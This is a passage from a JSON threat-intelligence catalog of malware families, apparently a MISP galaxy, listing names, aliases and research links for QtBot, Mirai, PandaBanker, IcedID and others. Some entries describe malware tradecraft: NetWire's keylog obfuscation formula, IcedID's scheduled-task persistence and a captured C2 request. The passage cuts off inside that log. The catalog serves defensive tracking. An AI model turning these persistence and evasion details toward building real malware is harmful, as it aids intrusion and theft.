- "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system",
- "meta": {
- "synonyms": [
- "ReRol"
- ],
- "type": [],
- "refs": [
- "https://community.fireeye.com/external/1093"
- ]
- }
- },
- {
- "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222",
- "value": "QtBot",
- "description": "",
- "meta": {
- "synonyms": [
- "qtproject"
- ],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/"
- ]
- }
- },
- {
- "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e",
- "value": "Combos",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
- ]
- }
- },
- {
- "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018",
- "value": "Sinowal",
- "description": "",
- "meta": {
- "synonyms": [
- "Quarian",
- "Mebroot",
- "Anserin",
- "Theola"
- ],
- "type": [],
- "refs": [
- "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2",
- "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/",
- "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan"
- ]
- }
- },
- {
- "uuid": "8410d208-7450-407d-b56c-e5c1ced19632",
- "value": "gsecdump",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://attack.mitre.org/wiki/Technique/T1003"
- ]
- }
- },
- {
- "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de",
- "value": "nRansom",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/malwrhunterteam/status/910952333084971008",
- "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
- "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/"
- ]
- }
- },
- {
- "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f",
- "value": "RedAlert2",
- "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores",
- "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html"
- ]
- }
- },
- {
- "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb",
- "value": "Qadars",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
- "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf",
- "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
- "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
- "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
- "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/"
- ]
- }
- },
- {
- "uuid": "42fa55e3-e708-4c11-b807-f31573639941",
- "value": "Retadup",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
- ]
- }
- },
- {
- "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6",
- "value": "Unlock92",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/struppigel/status/810753660737073153",
- "https://twitter.com/bartblaze/status/976188821078462465"
- ]
- }
- },
- {
- "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e",
- "value": "Jimmy",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
- ]
- }
- },
- {
- "uuid": "f856a7c7-768e-415f-90f8-80a914c77083",
- "value": "X-Agent",
- "description": "",
- "meta": {
- "synonyms": [
- "fysbis",
- "splm",
- "chopstick"
- ],
- "type": [],
- "refs": [
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
- "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
- ]
- }
- },
- {
- "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17",
- "value": "Kronos",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en",
- "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
- "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
- "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
- "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/"
- ]
- }
- },
- {
- "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f",
- "value": "WebC2-Bolid",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
- ]
- }
- },
- {
- "uuid": "52608ecb-3625-434a-88ef-9806b9b04e61",
- "value": "Erebus",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/"
- ]
- }
- },
- {
- "uuid": "d95f0171-8c5c-48ff-a22f-a8c20c196819",
- "value": "Mirai",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
- "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
- "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
- "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
- "https://isc.sans.edu/diary/22786",
- "https://github.com/jgamblin/Mirai-Source-Code",
- "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/"
- ]
- }
- },
- {
- "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303",
- "value": "PandaBanker",
- "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.",
- "meta": {
- "synonyms": [
- "ZeusPanda"
- ],
- "type": [],
- "refs": [
- "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
- "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
- "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
- "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market",
- "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media",
- "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/",
- "https://www.spamhaus.org/news/article/771/",
- "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
- "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks",
- "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
- "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
- "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/",
- "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
- "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/"
- ]
- }
- },
- {
- "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec",
- "value": "SmokeLoader",
- "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.",
- "meta": {
- "synonyms": [
- "Dofoil"
- ],
- "type": [],
- "refs": [
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
- "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
- "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
- "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
- "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/"
- ]
- }
- },
- {
- "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a",
- "value": "Andromeda",
- "description": "",
- "meta": {
- "synonyms": [
- "Gamarue",
- "B106-Gamarue",
- "B67-SS-Gamarue",
- "b66"
- ],
- "type": [],
- "refs": [
- "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet",
- "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
- "https://blog.avast.com/andromeda-under-the-microscope",
- "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
- "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/",
- "http://blog.morphisec.com/andromeda-tactics-analyzed",
- "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
- "http://resources.infosecinstitute.com/andromeda-bot-analysis/",
- "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
- "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08",
- "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/",
- "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
- "https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
- "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features",
- "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html"
- ]
- }
- },
- {
- "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2",
- "value": "DE Loader",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
- "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users"
- ]
- }
- },
- {
- "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6",
- "value": "CrashOverride",
- "description": "",
- "meta": {
- "synonyms": [
- "Crash",
- "Industroyer"
- ],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
- "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
- ]
- }
- },
- {
- "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395",
- "value": "Dyre",
- "description": "",
- "meta": {
- "synonyms": [
- "Dyreza"
- ],
- "type": [],
- "refs": [
- "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
- "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates"
- ]
- }
- },
- {
- "uuid": "7759534c-3298-42e9-adab-896d7e507f4f",
- "value": "MaMi",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://objective-see.com/blog/blog_0x26.html"
- ]
- }
- },
- {
- "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38",
- "value": "Xtreme RAT",
- "description": "",
- "meta": {
- "synonyms": [
- "ExtRat"
- ],
- "type": [],
- "refs": [
- "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017",
- "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
- "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat",
- "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html"
- ]
- }
- },
- {
- "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16",
- "value": "IcedID Downloader",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/"
- ]
- }
- },
- {
- "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
- "value": "elf.wellmess",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7",
- "value": "MalumPOS",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf"
- ]
- }
- },
- {
- "uuid": "721fe429-f240-4fd6-a5c9-187195624b51",
- "value": "Banatrix",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/"
- ]
- }
- },
- {
- "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd",
- "value": "UPAS",
- "description": "",
- "meta": {
- "synonyms": [
- "Rombrast"
- ],
- "type": [],
- "refs": [
- "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html",
- "https://twitter.com/ulexec/status/1005096227741020160",
- "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/"
- ]
- }
- },
- {
- "uuid": "53021414-97ad-4102-9cff-7a0e1997f867",
- "value": "Imminent Monitor RAT",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/"
- ]
- }
- },
- {
- "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8",
- "value": "CryptXXXX",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
- ]
- }
- },
- {
- "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0",
- "value": "LatentBot",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html",
- "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access",
- "http://malware-traffic-analysis.net/2017/04/25/index.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/",
- "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/"
- ]
- }
- },
- {
- "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd",
- "value": "PowerDuke",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
- ]
- }
- },
- {
- "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1",
- "value": "Rombertik",
- "description": "",
- "meta": {
- "synonyms": [
- "CarbonGrabber"
- ],
- "type": [],
- "refs": [
- "http://blogs.cisco.com/security/talos/rombertik"
- ]
- }
- },
- {
- "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30",
- "value": "MirageFox",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
- ]
- }
- },
- {
- "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74",
- "value": "Tempedreve",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf",
- "value": "IRRat",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
- ]
- }
- },
- {
- "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7",
- "value": "Kuaibu",
- "description": "",
- "meta": {
- "synonyms": [
- "Barys",
- "Gofot",
- "Kuaibpy"
- ],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "70cd1eb4-0410-47c6-8817-418380240d85",
- "value": "Logedrut",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
- ]
- }
- },
- {
- "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9",
- "value": "Jager Decryptor",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151",
- "value": "BrutPOS",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html"
- ]
- }
- },
- {
- "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
- "value": "Joao",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/"
- ]
- }
- },
- {
- "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc",
- "value": "EvilGrab",
- "description": "",
- "meta": {
- "synonyms": [
- "Vidgrab"
- ],
- "type": [],
- "refs": [
- "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf"
- ]
- }
- },
- {
- "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb",
- "value": "KAgent",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- }
- },
- {
- "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
- "value": "GlanceLove",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
- "https://www.ci-project.org/blog/2017/3/4/arid-viper",
- "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
- "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
- "https://www.clearskysec.com/glancelove/"
- ]
- }
- },
- {
- "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740",
- "value": "NetWire RC",
- "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n",
- "meta": {
- "synonyms": [
- "Recam"
- ],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
- "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
- "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
- "https://www.circl.lu/pub/tr-23/"
- ]
- }
- },
- {
- "uuid": "d77eacf7-090f-4cf6-a305-79a372241158",
- "value": "GetMyPass",
- "description": "",
- "meta": {
- "synonyms": [
- "getmypos"
- ],
- "type": [],
- "refs": [
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/",
- "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
- "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware"
- ]
- }
- },
- {
- "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248",
- "value": "Bella",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://github.com/kai5263499/Bella",
- "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/"
- ]
- }
- },
- {
- "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376",
- "value": "jRAT",
- "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.",
- "meta": {
- "synonyms": [
- "Jacksbot"
- ],
- "type": [],
- "refs": [
- "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
- "https://github.com/java-rat",
- "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered"
- ]
- }
- },
- {
- "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371",
- "value": "Solarbot",
- "description": "",
- "meta": {
- "synonyms": [
- "Napolar"
- ],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/",
- "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/"
- ]
- }
- },
- {
- "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8",
- "value": "CoinThief",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
- ]
- }
- },
- {
- "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f",
- "value": "VM Zeus",
- "description": "",
- "meta": {
- "synonyms": [
- "VMzeus",
- "ZeusVM",
- "Zberp"
- ],
- "type": [],
- "refs": [
- "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
- "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
- "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf"
- ]
- }
- },
- {
- "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec",
- "value": "SocksBot",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
- ]
- }
- },
- {
- "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a",
- "value": "Emdivi",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
- "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html",
- "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/"
- ]
- }
- },
- {
- "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91",
- "value": "Satan Ransomware",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
- "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
- "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html"
- ]
- }
- },
- {
- "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa",
- "value": "Microcin",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/",
- "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf"
- ]
- }
- },
- {
- "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410",
- "value": "Tapaoux",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf"
- ]
- }
- },
- {
- "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
- "value": "MysteryBot",
- "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
- ]
- }
- },
- {
- "uuid": "9481d7b1-307c-4504-9333-21720b85317b",
- "value": "Cohhoc",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf"
- ]
- }
- },
- {
- "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789",
- "value": "FakeDGA",
- "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).",
- "meta": {
- "synonyms": [
- "WillExec"
- ],
- "type": [],
- "refs": [
- "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
- "https://github.com/360netlab/DGA/issues/36",
- "http://www.freebuf.com/column/153424.html"
- ]
- }
- },
- {
- "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330",
- "value": "IcedID",
- "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: 